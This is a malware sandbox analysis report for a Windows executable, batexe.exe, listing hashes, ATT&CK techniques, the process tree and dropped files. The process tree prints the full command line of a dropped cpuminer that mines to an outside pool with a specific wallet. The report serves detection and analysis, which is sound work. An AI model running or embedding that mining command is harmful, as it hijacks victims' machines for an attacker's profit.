73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
311s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
12/02/2024, 05:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
2124	b2e.exe
2920	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2920	cpuminer-sse2.exe
2920	cpuminer-sse2.exe
2920	cpuminer-sse2.exe
2920	cpuminer-sse2.exe
2920	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2192-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2192 wrote to memory of 2124	2192	batexe.exe	83
PID 2192 wrote to memory of 2124	2192	batexe.exe	83
PID 2192 wrote to memory of 2124	2192	batexe.exe	83
PID 2124 wrote to memory of 3580	2124	b2e.exe	85
PID 2124 wrote to memory of 3580	2124	b2e.exe	85
PID 2124 wrote to memory of 3580	2124	b2e.exe	85
PID 3580 wrote to memory of 2920	3580	cmd.exe	87
PID 3580 wrote to memory of 2920	3580	cmd.exe	87

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2192
- C:\Users\Admin\AppData\Local\Temp\8D2C.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\8D2C.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8D2C.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9625.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3580
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2920

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8D2C.tmp\b2e.exe

Filesize
4.1MB

MD5
bb831d0d003f75aa1a768b1c23113aca

SHA1
6be83bd0565aabaf6cdf55693c86ff8e7ef36592

SHA256
05d57654a4071a5d6c33ec447afe480b81586decb5848e5ed0130e584a6ba506

SHA512
04e8acdb6a18d30f73a74abb3fbca957949bde60348ebe308b671e11db4474b8f6c6f8d9ecd72c6573e2cab6bba82e53752967ae26be7e35a84dff734ce277a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\8D2C.tmp\b2e.exe

Filesize
1.2MB

MD5
7b0f4c1d8506067fce25df5de733bcb7

SHA1
053b618c2012c6895e9709696395951acf15c165

SHA256
dd9a3eca69a73709146ebc228a433e0fef43ab6c12c2280725d798c7b494216a

SHA512
45ca44d04c436082073475b0bec73cdd3df1f0cc670d9a3d5dd77fc2b3b60ef870af5912d27269107222850b07234060eefb2d272b96de1367ff544cac506618

Download Submit
C:\Users\Admin\AppData\Local\Temp\8D2C.tmp\b2e.exe

Filesize
988KB

MD5
b37ebcd19304d3ce8ae2182f282f31aa

SHA1
7b1e73470e8c4238eb9de1fa6ad1895c3737a3d5

SHA256
63f85147481f33c2d77bb5cbd6bf0e7027e1f0b811f6c6f9be3fed84bec3ee7d

SHA512
c151bf1089d666bc6d739c92c9f88d75d0c2fa5ef95cbac3462409d5d6706d2eca461cdd3130221b75babb40d2ef099e0c5fc214d96ce38a6495a6b23fa2c115

Download Submit
C:\Users\Admin\AppData\Local\Temp\9625.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
628KB

MD5
dbd417adea261803a54866b802625258

SHA1
8e5d87c2f555585a71c222210946d98be6642b10

SHA256
d9f7a631cf4c503965bbf7db0f5cdc1b1077aca7335a5627de1471dc8597287e

SHA512
5fcd0bceca88c8df443400f1459d1b34cb9adff93dc8d30360da614dc2c11e8887e3686bc75a6f0f75c2d4b580f0310fe00632dad7c9cb5b34c066c0bf0ac95d

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
669KB

MD5
b78ad8a2f4c7188c1c90b4b5ffcf3056

SHA1
d31bfb29c84507303b57d8a9b8c31dcd91765846

SHA256
d912434d0c6da95efb4c546d63f5a0876f973723e9e0fbc87ea4cde8c8f89d6b

SHA512
c59bf7e31f56beeb677e88e7152c9147c90a7214ae372a4ee4842925b638609814771bc26e7fbba801f39f2cb60dbb8f43662e1d45b101224cf90bb237f66972

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
330KB

MD5
e01ed7f782f7707765dc8e1adb179647

SHA1
21769048d477064870848a59c993fca42117c7b1

SHA256
d65f4eefa22c61a442000b33bddefb763aa2c151e65db76a5af66017ea653a01

SHA512
80a3b76c569864a1f809e86db8ed008beaba49f6124ffb895b118c175a085adaa01f136dd1639f3016a36e692aa211f6d255d6027ad87e0f07b433a1982bbc34

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
292KB

MD5
ae3a2aa2ee696557499814a98745e202

SHA1
4126cd2fd8233d96f120f0377ad7e2d25e82e02c

SHA256
9b1baebf230669eba6b27f8f2a6e8ca4f3d70fb5b425104d06cb2b14293e8572

SHA512
40e15563024ef72871d05f4c4ad50c90b455a0a0289565571cbd4ccda4e57d61ecbcd34c4170e78beca2f08435ee1ac71a960dc41b9dbddcacb88fe724ab551a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
8abfbf057aad1a42b80ae41d040e5c35

SHA1
cb3a46d7971dd0f5a796138f7522f7ba22fc0b37

SHA256
49d8b4354737970e41f238b4de263ea8b5d3255077a873ba293575600a9a4743

SHA512
fcaf6f8a72dae2be0d64c584941cf2094baf82c4cc5d416daf0390647d484bd4b6194b9bae88435fb7c8289ea140cafdc767d7a2febcb49a0c0c62a0e05c9a2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
534KB

MD5
05cac06c709f7b002e08c3254b6de6c5

SHA1
689854183d078b27c20ec5aa0d2f802d4557fb0b

SHA256
3c947f2b4b6475da83ab8621664c696a78d676189b146bac5e5f3076fd2da66d

SHA512
4fa5e9425de3b04c327c1e49575dbe495d531b61eaa0d3f168980f484c926c0130f9ebf4f654c55ca54b5d4d0b835509f6f1c10ca08f4b17f370b3bb564c7f02

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.3MB

MD5
7193bf6db6547d87e739d18dd040d1f7

SHA1
82ff7d5638de852fd5ab71bf210be731ca42612a

SHA256
236a8646d6bbdc794511021481ad7b06b31b169a41ff0243188749ad54ab1d88

SHA512
b2c52377974b62d20ee4b401b251d328a5215adba1e008fb0c45c06c869f569f7e3777f8867af8581e0d690cdedb3e2ea1b7a13d6fe6b068da96ac24e4a6fbef

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
254KB

MD5
3906f18ee72b10ff72276adcf3136fef

SHA1
0552da0c36db1fe8f229e5b7f8c6fb1fffad38da

SHA256
8c34a6cd396657a79e9d3423058c18e2b5084ba3a50c5fda108eb143af2d340e

SHA512
0934c835914661d10c77f7e0f52d44f7ffa0af440be3e446547645cd1a5b45ecf43f2469023ea1cf4797ace7b046fe30a790e7dac5442e8e40f28779b11a35ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
296KB

MD5
b2309aac895f8b3100bf481ada46d1aa

SHA1
a9cccb945867aa12ad9904bf3c03c6424ad6aab6

SHA256
af2ad206d8ffd0723a92e4da1f0127669f64fcb535a5d89768a3ea57b1c64dc2

SHA512
a21453d9029f7ee8bde9744c14a74bc5b994b84a386ef723f2b36411d52ce74768121eac2d08cc5176f9a0031f10af58d47b677e5eb68171bc03ae1a0e4df7cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
502KB

MD5
d45388b9dd2f8796497ef9c5f041184d

SHA1
a9c10494dbed90c289b896ab3df19c10957a455a

SHA256
f0f4744de63a4f77a513ba4ea09f20a156e403708126fe3fda9f772913a58c02

SHA512
3b3074af5c6179488d3d600a47b845da084ca932af33f4fad56343507e00117a79ecaf5a9eec57ee7090d5d4adfb72d5f30d39774f3ec0f45ebbe908001062f3

Download Submit
memory/2124-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2124-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2192-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/2920-45-0x0000000073260000-0x00000000732F8000-memory.dmp

Filesize
608KB

Download
memory/2920-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2920-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2920-47-0x0000000001060000-0x0000000002915000-memory.dmp

Filesize
24.7MB

Download
memory/2920-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2920-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2920-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2920-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2920-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2920-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2920-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2920-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2920-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2920-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2920-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2920-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download